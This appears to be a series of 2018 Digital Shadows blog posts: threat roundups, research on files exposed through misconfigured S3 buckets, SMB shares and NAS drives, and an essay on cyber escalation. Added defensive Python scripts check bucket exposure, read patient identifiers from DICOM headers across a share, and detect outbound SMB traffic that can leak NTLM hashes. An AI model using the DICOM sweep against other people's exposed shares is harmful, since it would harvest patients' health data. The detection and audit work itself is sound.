Shadow Talk Update – 04.30.2018 Mon, 30 Apr 2018 15:02:02 +0000 In this week’s episode of Shadow Talk, we cover the targeting of healthcare organizations by Orangeworm, BGP hijacking, vulnerabilities in MikroTik routers, DDoS market shutdowns, and the profitability of cryptocurrency mining.

Orangeworm actively targets healthcare via supply chain

Security software company Symantec reported on a newly identified threat group called Orangeworm, observed targeting entities in the healthcare industry with custom backdoor malware. Multiple geographies have been affected, which is likely the result of Orangeworm attacking international organizations. Orangeworm conducted information theft and reconnaissance, but the group’s exact motives are unconfirmed at the time of writing.


Spam campaign drops multiple payloads

A new spam campaign is targeting multiple geographies with a quartet of malware that comprises the “Adwind” RAT, the backdoors “XTRAT” and “DUNIHI”, and the information stealer “Loki Bot”. All the payloads are highly configurable and enable various malicious activities, including information theft and remote-access tasks. This is the first reported instance of these malware families being bundled together in a spam campaign, having previously been distributed in separate attacks.


Botnet exploits Drupal vulnerability

A botnet is actively using six exploits, including one for the remote code execution (RCE) vulnerability affecting the Drupal CMS. Its aim is to perform DoS attacks and mine cryptocurrencies. CVE-2018-7600 was classified as “highly critical” when publicly announced, and security updates have been released to address the flaw. This is the first identified incident of a threat actor targeting this vulnerability. Based on the popularity of RCE exploits, additional targeting is highly likely in the immediate future (next few weeks).


Threat actor zeroes in on Internet Explorer zero-day vulnerability

Security company Qihoo360 reported the exploitation of a zero-day vulnerability affecting the Internet Explorer browser’s kernel code by an unidentified threat actor. The vulnerability was labeled a “double play” loophole, but Microsoft has yet to release more technical details or information pertaining to the exploitation. The flaw reportedly affects all current versions of Internet Explorer and applications using the kernel.

The critical code of the kernel is usually loaded into a separate area of memory, which is protected from access by application programs or other, less critical parts of the operating system.

Digital Shadows Opens New State of the Art London Office in Canary Wharf Thu, 26 Apr 2018 16:52:17 +0000 When James Chappell and I set up the company six years ago at a kitchen table in Camden, London, we suspected we had a good idea, but we didn’t quite envision just how cybercrime would proliferate and just how hard and complicated it would become for organizations to manage their digital risk. That’s where we feel we can help, and why we have made such a bold bet on the future of Digital Shadows. After 6 years of incredible growth, protecting hundreds of customers across the globe, I am excited to announce that Digital Shadows has opened a new state of the art London office in Canary Wharf.



We now have nearly 200 employees across the globe, and London remains the beating heart of the operation, where all of our product and engineering work takes place. Our new office in Canary Wharf marks a long-term commitment to London and means that we are now set up to expand the business significantly and serve our clients even better. As a first step, we expect to create at least 20 jobs in London over the next year.

Today we hosted nearly 100 customers, employees, investors, advisors, media, friends and family at the new office to celebrate. James helped me kick off the event with a speech thanking all who have helped us advance Digital Shadows to this point. We then heard from guest speakers Lord Ashton, Sir George Iacobescu, Alex Macpherson and Ben Brabyn, followed by a ribbon-cutting ceremony.


What an event! It was a celebration of what we have accomplished so far and what is to come to help make the world a safer place. Thanks again to everyone who has helped us arrive here. We are excited for the future growth of the company and I can’t wait to see what evolves next. Cheers!

Keys to the Kingdom: Exposed Security Assessments Tue, 24 Apr 2018 15:04:27 +0000 Organizations employ external consultants and suppliers to perform assessments and penetration tests that help to bolster their overall internal security. When carrying out these projects, these contractors are often given a level of privileged access and insight into the most sensitive areas of an organization’s infrastructure. These exercises, however, don’t serve their envisioned purpose if security reports are made available online for anyone to find. Our recent research paper, “Too Much Information”, shines a light on this worrying discovery.

Imagine giving a houseguest or tradesperson a set of keys to your home. Now picture them, albeit unwittingly, making copies of those keys and leaving them lying around in public for anyone to pick up. Similarly, as consultants and pen testers back up and share their work, highly sensitive material such as vulnerability assessments and network diagrams can be left exposed and, crucially, within reach of malicious actors.

Our analysis of files exposed through file-sharing services and storage such as Amazon S3 buckets and NAS drives found thousands of publicly accessible security audits (5,794), “network infrastructure” documents (1,830) and penetration test reports (694).


Figure 1: Results for security assessment files and documents


Ready-made reconnaissance

Coming across this type of sensitive information would be like striking gold for an attacker. Attackers can spend months conducting reconnaissance to learn about a target’s security posture, infrastructure layout, deployed technologies and potential vulnerabilities; this kind of exposure saves them that time and effort. In some cases it even hands them information they could never have learned through passive reconnaissance, such as the findings of an authenticated internal assessment.

In one instance, we found a series of security documents belonging to a leading European supplier of electronic identification services used within the banking industry. These files included in-depth security assessments, source code testing results, and vulnerability scanning reports that revealed details of insecure servers. The reports exposed server locations and hosting IPs, missing software patches, port information, CVE numbers and vulnerability descriptions (see Figure 2 below). With this intelligence, an attacker would know exactly which technologies and services to target, and could then modify data, inject malicious code, or perform man-in-the-middle attacks.


Figure 2: Redacted spreadsheet outlining critical vulnerabilities in banking software


Unintentional insiders and supply chain risk

Organizations typically struggle with security issues that lie outside their direct visibility, beyond the perimeter: an employee doing work on a personal or public device, or a contractor backing up files to a misconfigured NAS drive. Supply chains and insiders are therefore a persistent weak point when it comes to protecting company data.

It’s not just about how these individuals work when they are outside the company network; the very process of managing third-party access comes with pitfalls of its own. We can all imagine situations where a network service is opened up to move data around or to give a third party temporary access (for troubleshooting, software support or reporting, say) and that access never gets revoked. Permissions are easy to get wrong, especially when an S3 bucket must be readable by a select group of people but closed to everyone else: a bucket policy written with a wildcard principal, or an ACL grant to the AllUsers group, quietly makes it readable by the whole internet. This is where mistakes are made.
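As an added example (not Digital Shadows’ tooling and not from the report), the Python below evaluates the ACL and bucket policy JSON that the AWS CLI’s get-bucket-acl and get-bucket-policy commands return, and lists every reason a bucket is readable by the world. The sample documents are constructed; the account ID and role name in the corrected policy are placeholders.

```python
"""Flag S3 buckets that are readable by the world or by any AWS account.

Added example, not from the report.  It evaluates the JSON that
`aws s3api get-bucket-acl` and `aws s3api get-bucket-policy` return, so it can
run offline on saved output.  The sample documents below are constructed.
"""
import json

PUBLIC_GRANTEES = {
    "http://acs.amazonaws.com/groups/global/AllUsers": "everyone",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers": "any AWS account",
}
READ_PERMISSIONS = {"READ", "READ_ACP", "FULL_CONTROL"}
READ_ACTIONS = {"s3:getobject", "s3:listbucket", "s3:*", "*"}


def _as_list(value):
    return [value] if isinstance(value, (str, dict)) else list(value or [])


def _principal_is_public(principal):
    """True for Principal "*" or {"AWS": "*"}: any caller, unauthenticated included."""
    if principal == "*":
        return True
    return isinstance(principal, dict) and "*" in _as_list(principal.get("AWS"))


def acl_findings(acl):
    """Findings for ACL grants to the AllUsers / AuthenticatedUsers groups."""
    findings = []
    for grant in acl.get("Grants", []):
        who = PUBLIC_GRANTEES.get(grant.get("Grantee", {}).get("URI"))
        if who and grant.get("Permission") in READ_PERMISSIONS:
            findings.append(f"ACL grants {grant['Permission']} to {who}")
    return findings


def policy_findings(policy):
    """Findings for Allow statements that give read access to a wildcard principal."""
    findings = []
    for stmt in _as_list(policy.get("Statement")):
        if stmt.get("Effect") != "Allow" or not _principal_is_public(stmt.get("Principal")):
            continue
        exposed = sorted(a for a in _as_list(stmt.get("Action")) if a.lower() in READ_ACTIONS)
        if not exposed:
            continue
        # A Condition (aws:SourceIp, aws:SourceVpce, ...) may narrow the grant.  Report it
        # for review rather than trusting it: conditions are where most mistakes hide.
        note = " (narrowed by a Condition, review it)" if stmt.get("Condition") else ""
        findings.append(f"policy {stmt.get('Sid', '<no Sid>')} allows {', '.join(exposed)} to anyone{note}")
    return findings


def public_findings(acl, policy=None):
    """All reasons the bucket is exposed; an empty list means no public read path was found."""
    return acl_findings(acl) + (policy_findings(policy) if policy else [])


# Constructed samples.  The "shared with pentesters" bucket was meant for one account
# but was written with a wildcard principal; the fixed policy names the account
# (placeholder account ID and role name).
OWNER_GRANT = {"Grantee": {"Type": "CanonicalUser", "ID": "owner-id"}, "Permission": "FULL_CONTROL"}
EXPOSED_ACL = {"Grants": [OWNER_GRANT, {
    "Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
    "Permission": "READ"}]}
PRIVATE_ACL = {"Grants": [OWNER_GRANT]}
EXPOSED_POLICY = json.loads("""{
  "Version": "2012-10-17",
  "Statement": [{"Sid": "ShareWithPentesters", "Effect": "Allow", "Principal": "*",
                 "Action": ["s3:GetObject", "s3:ListBucket"],
                 "Resource": ["arn:aws:s3:::example-assessments",
                              "arn:aws:s3:::example-assessments/*"]}]
}""")
FIXED_POLICY = json.loads(json.dumps(EXPOSED_POLICY))
FIXED_POLICY["Statement"][0]["Principal"] = {"AWS": "arn:aws:iam::123456789012:role/pentest-reader"}

if __name__ == "__main__":
    print("exposed bucket:", public_findings(EXPOSED_ACL, EXPOSED_POLICY))
    print("fixed bucket:  ", public_findings(PRIVATE_ACL, FIXED_POLICY))
```

The check deliberately reports statements that carry a Condition instead of accepting them: a typo in an aws:SourceIp range is exactly the kind of mistake that turns “open to a select group” into “open to everyone”.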

Given the amount of data exposed in this way, the long-term solution lies in training and awareness. Organizations can play their part by educating employees, contractors and consultants about the risks of copying and archiving work files at home, and by periodically searching these same services for their own documents. Offering secure-by-default storage, so that these individuals don’t feel the need to back up their devices at home, would also go a long way towards preventing this level of exposure.


To learn more about the level of data exposure across the world, as well as useful tips for mitigating these risks, download a copy of our report.

Want more Digital Shadows research? Subscribe to our threat intelligence emails here.


Shadow Talk Update – 04.23.2018 Mon, 23 Apr 2018 15:30:32 +0000 This week’s Shadow Talk discusses Russia’s attempts to ban a social messaging app, and reads between the lines of the joint US and UK advisory on network infrastructure compromises by Kremlin-backed actors. We also outline the new ransomware payload incorporated into the Magnitude exploit kit, and bring you the latest on vulnerabilities in the Drupal platform and Cisco’s WebEx software.



Russian threat actors compromised network infrastructure

On 16 April, US-CERT and the United Kingdom’s NCSC published a joint technical advisory on the compromise of network infrastructure devices in multiple sectors by Russian state-backed threat actors. Since 2015 these actors have scanned the internet for infrastructure devices running legacy protocols or with weak security (the advisory names Telnet, SNMP and Cisco Smart Install among them), then used default, stolen or brute-forced credentials to authenticate to the devices. This allowed network mapping, man-in-the-middle operations and modification of firmware. The attackers may have obtained sensitive information, or secured a foothold for future operations.

The advisory was likely released to demonstrate cyber defense cooperation, as well as political solidarity, between the United States and the United Kingdom, given current political tension with Russia. The present activity level of this campaign is unknown: although security firms detected increases in scanning for some of the targeted devices, this was not independently attributed to Russian threat actors. Network infrastructure is a target for multiple threat groups, and given the number of unsecured devices and the tools available to exploit them, this is likely to continue.


Drupal vulnerability exploited

Proof-of-concept (PoC) code for an RCE vulnerability (CVE-2018-7600) affecting the Drupal content management system was released online, and security companies detected exploitation shortly afterwards. Exploitation allows the compromise of legitimate and trusted websites, which can then be used to host malicious content or attack visitors. Users should upgrade to a patched Drupal release (the fix shipped in Drupal 7.58 and 8.5.1, with backports to 8.3.9 and 8.4.6). Because the flaw is exploitable without authentication, sites left unpatched after the PoC appeared should also be checked for signs of compromise rather than simply patched.


RCE vulnerability affects Cisco WebEx

Certain Cisco WebEx products are affected by a newly identified RCE vulnerability, CVE-2018-0112. If exploited, an attacker could run arbitrary code on the affected system. Cisco has released updates to address the flaw; there are no reports of the vulnerability having been exploited in the wild to date.


Magnitude exploit kit switches ransomware payload

The Magnitude exploit kit was identified distributing GandCrab ransomware, a new payload for this kit; Magnitude previously distributed the “Magniber” and “Cerber” ransomware variants. There were no changes to its distribution methods or target geographies. GandCrab has been the payload of multiple campaigns in 2018 and appears relatively popular with threat actors, likely because it is offered as ransomware-as-a-service. At the time of writing, no decryption tool is publicly available for the GandCrab version deployed in this campaign.

Out In The Open: Corporate Secrets Exposed Through Misconfigured Services Wed, 18 Apr 2018 14:31:10 +0000 For organizations dealing with proprietary information or assets, one of the greatest concerns is the threat of competitors getting hold of trade secrets. But what if organizations are already leaving their precious Intellectual Property (IP) publicly exposed, within easy reach of attackers?

Our latest research report, “Too Much Information”, highlights the sheer scale of this occurrence. The reality is that a lot of organizations are giving up this information freely, by unintentionally exposing IP through Amazon S3 buckets, rsync, SMB, FTP, NAS drives, and misconfigured websites.


Would you like any secret source with that?

Among the 1.5 billion files we found exposed through these services were over 95,000 examples of source code information, 900 patent applications, and 69 copyright applications.

Figure 1: Types of publicly-available intellectual property

In one instance, we detected a document containing proprietary source code that was submitted as part of a copyright application (Figure 2). The file included code that outlined the workflow and design of a site providing Electronic Medical Records, all of which was uploaded onto a publicly accessible Amazon S3 bucket.

Figure 2: Introductory page for copyright application containing source code for a company’s app

In another example, we came across an archive of patent summaries for a renewable energy technology company (Figure 3). These documents were marked as “strictly confidential” and contained a copious selection of patent applications complete with detailed labelled diagrams, patent application numbers, filing dates and patent descriptions that discussed the advantages and disadvantages of their product.

Figure 3: Redacted page from patent documents belonging to renewable energy company 


Corporate espionage made easy

Of all the data organizations look to control, IP is among the most precious. Loss of IP can have a number of considerable impacts:

  • Financial loss. There are obvious economic consequences to losing your most sensitive IP. First, there are the direct costs of dealing with the security incident: resources must be assigned to investigate how the exposure occurred, improve security measures and handle the PR response. More damagingly, the release of product information ahead of schedule can seriously harm an organization’s financial performance. For technology companies, source code that developers have spent months writing could be released by malicious actors before the product ships, seriously dampening sales prospects. For some companies, this could put their future in jeopardy.
  • Competitive de-positioning. Imagine a pharmaceutical company that has spent years researching a new drug; all that time and financial input would go to waste if a competitor on the other side of the world now had all the information needed to put that drug into production. Proprietary code, patent applications and copyright information would give your closest business rivals some very timely and useful competitive intelligence.
  • Reputational damage. Loss of IP might cost you customers and contracts, credit ratings, stock market value or brand reputation. No organization wants to be known as a company that can’t keep its own source code under wraps. If companies can’t be trusted to protect their most prized assets, then customers will likely assume that their overall approach to data protection, including protecting personal data, is also lacking.
  • National security risk. Certain industries, such as defense, manufacturing and national infrastructure, worry about being caught in the midst of great-power struggles between states. Nation-state or state-affiliated actors conduct espionage campaigns to steal information that can improve a country’s military, market or export position. The stakes for properly securing sensitive assets are therefore far higher in these industries, and extend beyond the immediate concerns of the particular organization involved.


While organizations may worry about corporate espionage conducted through insiders, network intrusions and phishing campaigns, these findings demonstrate that there is already a large amount of sensitive data publicly available. Talk about making the competition’s job even easier.

To learn more about the other types of sensitive data that these services are exposing, download a copy of our report.


Want more Digital Shadows research? Subscribe to our threat intelligence emails here.

When There’s No Need to Hack: Exposed Personal Information Tue, 17 Apr 2018 14:57:11 +0000 With Equifax’s breach of 145 million records still fresh in everyone’s memory and the recent Facebook data privacy controversy, protecting personal data has become part of the political, economic and cultural zeitgeist. Debates over how data can be misused are now commonplace, and newsfeeds are awash with stories of “yet another breach of personal information”. There’s a reason for this: data is a valuable commodity, and there’s a lot of money to be made from trading personal information or using it for fraud. Cybercriminals are therefore continuing to launch phishing campaigns and network intrusions designed to collect personal data.

However, our latest research report, “Too Much Information”, highlights that there is a large amount of personal data already exposed that puts your employees and customers at risk. This data is unintentionally made public through misconfigured Amazon S3 buckets, rsync, SMB, FTP, NAS drives, and misconfigured websites. Let’s focus on a few examples that illustrate the extent of this exposure.

Tax Returns

Today is tax deadline day, which means there are still people scrambling to submit their tax returns. This window affords criminals opportunities to commit tax return fraud. As we talked about in a previous blog, “It’s Accrual World: Tax Return Fraud in 2018”, criminals go to great lengths to acquire this information. Spoiler alert: there’s plenty of information already out there.

Figure 1: Types of publicly-available personal information

In fact, the most common employee data found in our research was payroll and tax return files, which accounted for 700,000 and 60,000 files respectively. Looking into many of these examples, it was common for this information to be exposed through a contractor – for instance, a boutique accounting firm that backed up their client information. A redacted exposed pay stub is shown in Figure 2.

Figure 2: A redacted example of an exposed pay stub

Unhealthy Exposure

Aside from financial information, there was also a strong medical flavor to the findings. Almost 5,000 patient lists were publicly available. Most surprisingly, we found over two million .dcm files (2,205,350) exposed via an open SMB share on a host in Italy. These are Digital Imaging and Communications in Medicine (DICOM) files, the standard format for storing and exchanging medical images such as MRI and CT scans; each file carries the patient’s name, identifiers and study details in its header alongside the image data. That’s an awful lot of files, and it doesn’t get much more personal than that.
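As an added example (not from the report), the Python below shows why a pile of .dcm files is a personal-data exposure rather than just a pile of images: it recognizes DICOM files by their magic bytes and reads the patient name and ID straight out of the header, without a DICOM library. The file it parses is constructed in memory with fictitious values; scan_paths is the hypothetical entry point you would run over a mounted share.

```python
"""Identify DICOM files and read the patient identifiers from their headers.

Added example, not from the report.  Minimal DICOM Part 10 reader: checks the
"DICM" magic at offset 128, walks the file-meta group (always explicit VR little
endian) for the transfer syntax, then walks the data set just far enough to read
PatientName (0010,0010) and PatientID (0010,0020).  Only the two little-endian
transfer syntaxes are handled, and undefined-length sequences are skipped to their
delimiter without recursing into items.  The sample file is constructed in memory.
"""
import struct

EXPLICIT_LE = "1.2.840.10008.1.2.1"
IMPLICIT_LE = "1.2.840.10008.1.2"
LONG_VRS = {b"OB", b"OW", b"OF", b"SQ", b"UT", b"UN"}   # VRs with a 4-byte length field
UNDEFINED = 0xFFFFFFFF
SEQ_DELIM = b"\xfe\xff\xdd\xe0\x00\x00\x00\x00"           # (FFFE,E0DD) with zero length


def walk(buf, pos, explicit):
    """Yield (group, element, value, next_pos) for consecutive data elements."""
    try:
        while pos + 8 <= len(buf):
            group, elem = struct.unpack_from("<HH", buf, pos)
            pos += 4
            if explicit:
                vr = buf[pos:pos + 2]
                if vr in LONG_VRS:             # VR, 2 reserved bytes, uint32 length
                    length = struct.unpack_from("<I", buf, pos + 4)[0]
                    pos += 8
                else:                          # VR, uint16 length
                    length = struct.unpack_from("<H", buf, pos + 2)[0]
                    pos += 4
            else:                              # implicit VR: uint32 length only
                length = struct.unpack_from("<I", buf, pos)[0]
                pos += 4
            if length == UNDEFINED:            # sequence of undefined length: skip it
                end = buf.find(SEQ_DELIM, pos)
                if end < 0:
                    return
                pos = end + len(SEQ_DELIM)
                yield group, elem, b"", pos
                continue
            value = buf[pos:pos + length]
            pos += length
            yield group, elem, value, pos
    except struct.error:
        return


def patient_fields(buf):
    """Return transfer syntax and patient identifiers, or None if buf is not DICOM."""
    if len(buf) < 132 or buf[128:132] != b"DICM":
        return None
    syntax, pos = IMPLICIT_LE, 132            # implicit VR LE is the default if unspecified
    for group, elem, value, after in walk(buf, pos, explicit=True):
        if group != 0x0002:
            break                              # first data-set element: stop, keep pos
        pos = after
        if elem == 0x0010:
            syntax = value.rstrip(b"\x00 ").decode("ascii")
    fields = {"transfer_syntax": syntax}
    if syntax not in (EXPLICIT_LE, IMPLICIT_LE):
        return fields                          # big-endian or deflated: not handled here
    for group, elem, value, _ in walk(buf, pos, explicit=(syntax == EXPLICIT_LE)):
        if group > 0x0010:
            break                              # tags are ascending; past the patient group
        if group == 0x0010 and elem in (0x0010, 0x0020):
            name = "PatientName" if elem == 0x0010 else "PatientID"
            fields[name] = value.rstrip(b" \x00").decode("latin-1")
    return fields


def element(group, elem, vr, value, explicit=True):
    """Encode one little-endian data element (only used to build the sample)."""
    if len(value) % 2:
        value += b"\x00" if vr == b"UI" else b" "
    head = struct.pack("<HH", group, elem)
    if not explicit:
        return head + struct.pack("<I", len(value)) + value
    if vr in LONG_VRS:
        return head + vr + b"\x00\x00" + struct.pack("<I", len(value)) + value
    return head + vr + struct.pack("<H", len(value)) + value


def build_sample(explicit=True):
    """Constructed MR image file with fictitious patient data and 16 bytes of pixel data."""
    syntax = EXPLICIT_LE if explicit else IMPLICIT_LE
    body = element(0x0002, 0x0001, b"OB", b"\x00\x01") + element(0x0002, 0x0010, b"UI", syntax.encode())
    meta = element(0x0002, 0x0000, b"UL", struct.pack("<I", len(body))) + body
    data = (element(0x0008, 0x0060, b"CS", b"MR", explicit)
            + element(0x0010, 0x0010, b"PN", b"DOE^JANE", explicit)
            + element(0x0010, 0x0020, b"LO", b"MRN-0042", explicit)
            + element(0x7FE0, 0x0010, b"OB", b"\x00" * 16, explicit))
    return b"\x00" * 128 + b"DICM" + meta + data


def scan_paths(paths, head=65536):
    """Map each DICOM file among paths to its patient fields, reading only the first head bytes."""
    found = {}
    for path in paths:
        with open(path, "rb") as fh:
            fields = patient_fields(fh.read(head))
        if fields:
            found[path] = fields
    return found


if __name__ == "__main__":
    for explicit in (True, False):
        print(patient_fields(build_sample(explicit)))
```

Reading only the first 64 KiB of each file keeps a sweep of two million files cheap: the identifying tags sit in group 0010, well before the pixel data, so the image itself never needs to be read to establish that the share leaks health information.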

Personally Identifiable Information versus Personal Data

Personally Identifiable Information (PII) and Personal Data are two terms that are often used interchangeably.  PII is mainly used in the U.S. and is defined by NIST as:

“Any information about an individual maintained by an agency, including (1) any information that can be used to distinguish or trace an individual’s identity, such as name, social security number, date and place of birth, mother’s maiden name, or biometric records; and (2) any other information that is linked or linkable to an individual, such as medical, educational, financial, and employment information.”

Pretty comprehensive, right? Well, not as comprehensive as “personal data”, the term used by the General Data Protection Regulation (GDPR), which broadens the definition to include things like device IDs, IP addresses and cookies. GDPR comes into force next month, on 25 May 2018.

Our research found that a significant portion of the exposed data was in the European Union (537,720,919 files). With GDPR firmly on the horizon, organizations must consider how they are protecting employee and consumer information across these services. With employees and contractors often backing up and archiving data on their home networks or using cloud storage solutions, organizations need to ensure they have visibility into all the potential areas their customers’ personal data may be exposed. Out of sight may mean out of mind, but with GDPR coming into force, this could also mean organizations may soon be “out of pocket”.

Figure 3: The top countries making up the 500 million exposed files in the European Union


To learn more about the other types of sensitive data that these services are exposing, download a copy of our report. You can also find out more about the implications of GDPR in our “Path to Compliance” paper.


Want more Digital Shadows research? Subscribe to our threat intelligence emails here.

Shadow Talk Update – 04.16.2018 Mon, 16 Apr 2018 14:32:47 +0000 This week’s Shadow Talk discusses a Cisco Smart Install Client flaw exploited in disruption attack, an information leak vulnerability discovered in Microsoft Outlook, details on OpIcarus and OpIsrael, Verizon DBIR, and why you still should be excited about the RSA Conference.


Cisco Smart Install Client enabled mass disruption

Attackers abused the legitimate Cisco Smart Install protocol to target Iranian and Russian switches in a disruptive operation. Through defacements left in the start-up configuration of affected devices, and in statements to journalists, the perpetrators claimed to have acted in defense of the integrity of United States elections, although their identity and origin remain unknown. This activity occurred against a backdrop of escalating political tension between the United States and the affected nations. The tools needed to identify and exploit the issue are readily available, potentially allowing exploitation by attackers with even low capability. System administrators should disable the Smart Install client (“no vstack” on Cisco IOS) and restrict access to port 4786/tcp at the network edge to limit exposure.

New ATM malware variant discovered

A potentially new variant of automated teller machine (ATM) malware, “ATMJackpot”, was documented by security researchers. Its operators attempt to steal cash from ATMs by connecting to cash dispensers and other peripheral devices via a piece of middleware called eXtension for Financial Services (XFS) Manager. Because the initial infection vector for ATMJackpot is not known, a full assessment of its threat cannot be made at the time of writing. If the malware was installed via network intrusion, that would typically require technical capability and would indicate that the wider attack campaign represents a high level of threat. However, if it was installed via physical access to ATMs, fewer skills would be needed and the financial impact would likely be significantly lower. Given the lack of details, the discovery of ATMJackpot does not necessarily represent a dramatic escalation in threat.


Microsoft Outlook flaw allows theft of password hashes

A Microsoft Outlook flaw (CVE-2018-0950) allows attackers to abuse the way the software renders email messages containing Object Linking and Embedding (OLE) objects in order to harvest users’ password hashes and other sensitive information. Without the patch Microsoft has released, if an OLE object hosted on a remote SMB server is embedded in a message, Outlook fetches it over Server Message Block (SMB) automatically when the message is previewed, and Windows authenticates to that server with the user’s NTLM credentials. The result is unauthorized information disclosure (a hash that can be cracked offline or relayed), with greater consequences if the technique is combined with other exploits. Digital Shadows has not seen reports of the vulnerability being exploited in the wild, although doing so would not require a high level of capability. Applying the patch and blocking outbound SMB (445/tcp and 137-139) at the network perimeter, where possible, are effective mitigations; the egress block also closes the same path for other NTLM credential-leak techniques.
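As an added example (not from the post or from Microsoft’s advisory), the Python below checks firewall logs for the condition that makes this class of leak work: an allowed outbound SMB connection from an internal host to an address on the internet. The key=value log format and the lines themselves are constructed to resemble common firewall syslog exports; FIELD_RE and the field names are assumptions to adapt to your device.

```python
"""Find allowed outbound SMB connections from internal hosts to the internet.

Added example, not from the advisory or this post.  The log lines are a
constructed key=value format resembling common firewall syslog exports; adjust
FIELD_RE and the field names for your device.  An NTLM-hash leak like the Outlook
OLE/SMB issue only pays off if the client can reach an attacker-controlled SMB
server, so an allowed TCP 445/139 flow from a private address to a public one is
the condition worth alerting on (and the check that your egress rule works).
"""
import ipaddress
import re

SMB_PORTS = {139, 445}
FIELD_RE = re.compile(r"(\w+)=(\S+)")
# Explicit RFC 1918 plus loopback/link-local.  Deliberately not ip_address().is_private:
# that also treats the documentation ranges used here as "internet" addresses as private.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]


def is_internal(ip):
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in INTERNAL_NETS)


def parse(line):
    """Turn 'k=v k=v ...' into a dict; tokens that are not key=value are ignored."""
    return dict(FIELD_RE.findall(line))


def smb_egress(lines):
    """Return parsed records for allowed TCP SMB flows leaving the internal ranges."""
    hits = []
    for line in lines:
        rec = parse(line)
        if rec.get("proto", "").lower() != "tcp" or rec.get("action", "").lower() != "allow":
            continue  # a denied attempt is the egress rule doing its job
        try:
            if int(rec.get("dport", -1)) not in SMB_PORTS:
                continue
        except ValueError:
            continue
        if is_internal(rec.get("src", "")) and not is_internal(rec.get("dst", "")):
            hits.append(rec)
    return hits


# Constructed sample: one leak-capable flow, one internal file-server flow, one blocked
# attempt, one unrelated HTTPS flow.
SAMPLE_LOG = [
    "ts=2018-04-12T09:14:02Z src=10.20.1.55 dst=203.0.113.44 proto=tcp dport=445 action=allow",
    "ts=2018-04-12T09:14:05Z src=10.20.1.55 dst=10.20.0.10 proto=tcp dport=445 action=allow",
    "ts=2018-04-12T09:15:41Z src=10.20.1.61 dst=198.51.100.9 proto=tcp dport=139 action=deny",
    "ts=2018-04-12T09:15:42Z src=10.20.1.61 dst=198.51.100.9 proto=tcp dport=443 action=allow",
]


def sample_hits():
    return smb_egress(SAMPLE_LOG)


if __name__ == "__main__":
    for rec in sample_hits():
        print(f"ALERT outbound SMB: {rec['src']} -> {rec['dst']}:{rec['dport']} at {rec['ts']}")
```

If this ever returns a record in production, the perimeter rule the advice above relies on is not in effect for that path, which is the finding to act on before worrying about the specific Outlook bug.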


Film service customers victims of payment data breach

On 09 Apr 2018, multiple media outlets reported on an allegedly targeted attack against food-service and facility-management company Sodexo’s cinema voucher program, Filmology. Sodexo stated that credit cards used on its website between 19 Mar 2018 and 03 Apr 2018 may have been compromised, and that it continues to investigate. However, a Filmology representative allegedly claimed that “the hack on the payment page was carried out over 2 months and involved many accounts”. Customers of Sodexo’s Filmology service should monitor for fraudulent charges to their credit cards and consider replacing those used during the date range stated by the company.


Compromised websites delivered NetSupport Manager RAT

On 05 Apr 2018 researchers at security company FireEye reported on a campaign delivering the commercially available “NetSupport Manager” remote-access tool (RAT). Threat actors used compromised websites to prompt visitors to download fake Flash, Chrome and Firefox updates. These were JavaScript files that ultimately fetched the RAT payload from a remote server. Digital Shadows’ research into the IP address used in the campaign demonstrated it has likely been used to distribute malware since at least November 2017. The threat actors have likely had some success, given the duration of activity. Their motive is unknown. Indicators of compromise can be found on the Digital Shadows online portal.


New activity sparked by OpIsrael and OpIcarus

Beginning on 07 Apr 2018 multiple hacktivists tweeted attack claims, as part of OpIsrael, an “Anonymous” collective-affiliated operation in support of Palestine. Attack claims typically included website defacements. However, Twitter user LorianSynaro also claimed to have obtained databases of 83 Israeli universities; a sample uploaded to code-sharing website Hastebin contained no sensitive information and was likely obtained from open sources. More OpIsrael claims are likely in the short-term future (within three months). Moreover, an operational announcement has called for a new phase of the OpIcarus hacktivist campaign in June 2018. The type of activity was not stipulated, but will highly likely include denial of service (DoS) attacks and data breach claims against financial entities. Recent iterations of OpIcarus have attracted scant threat actor involvement; thus, this new phase poses a very low risk at this time.


New botnet scanning activity targeting Brazil

Security company Trend Micro identified and reported on scanning activity targeting vulnerable internet of things devices in Brazil. The scanning originated with several compromised devices in China and mirrored the behavior of previously identified “Mirai” botnets, which used default and weak credentials to hijack devices. Mirai’s source code was publicly released in October 2016, which has enabled numerous threat actors to develop their own botnets of varying size. Targeting weak credentials is a common tactic used to create botnets; users should replace these with complex passwords.

Escalation in Cyberspace: Not as Deniable as We All Seem to Think? Thu, 12 Apr 2018 15:01:47 +0000 The recent assassination attempt on former Russian spy Sergey Skripal has led to a deluge of cyber-based conspiracy theories within the London security community. My own personal favourites are that (a) Skripal was targeted for assassination due to his alleged engagement with the UK security services over the 2016 Democratic National Committee (DNC) hack, and (b) that the UK government considered a cyber-attack on Russia in response to the assassination attempt. To date, both claims remain completely unsubstantiated. However, that so many theories around the Skripal case link cyber operations to a conventional covert operation is, to my mind, symptomatic of how intertwined modern international relations have become with cyber threats.


Escalation and de-escalation in international relations

International Relations (IR) is a deeply complex field of study that is increasingly integrating cyber security issues into its analysis. One concept within the field of IR that is particularly useful for understanding issues such as the ones generated by the Skripal event is that of escalation in levels of hostilities between states. Escalation occurs between states during or in the run-up to a period of conflict, and a situation can be seen either to be escalating or de-escalating depending on the situation and the wishes of the states involved.

One of the best examples of escalation is the Cuban missile crisis of 1962, when the construction of ballistic missile launch sites on the island led the Kennedy administration to impose a naval blockade and demand the withdrawal of all offensive weapons from Cuba. An important point here is that the processes of escalating and de-escalating involved signalling between the United States and the Soviet Union. Examples of signalling within the crisis included the building of the missile sites (escalation), Kennedy’s televised address on 22 October 1962 (escalation), the Soviet withdrawal of the missiles (de-escalation) and the US public commitment to respect Cuban sovereignty (de-escalation). These are all examples of provocative and palliative signalling between states.


Figure 1: Cuban Missile Crisis game tree modelling how US and Soviet actors would have considered their decisions (Source: Wikimedia Commons)


Cyber and the “space between”

Cyber operations are often, I believe incorrectly, portrayed as desirable precisely because they do not cause escalation between states. As Eric Rosenbach, former Assistant Secretary of Defense and principal cyber advisor to the Pentagon from 2011 to 2015, commented:

“The place where I think it will be most helpful to senior policymakers is what I call “the space between.” What is the space between? … You have diplomacy, economic sanctions…and then you have military action. In between there’s this space, right? In cyber, there are a lot of things that you can do in that space between that can help us [the United States] accomplish the national interest.”

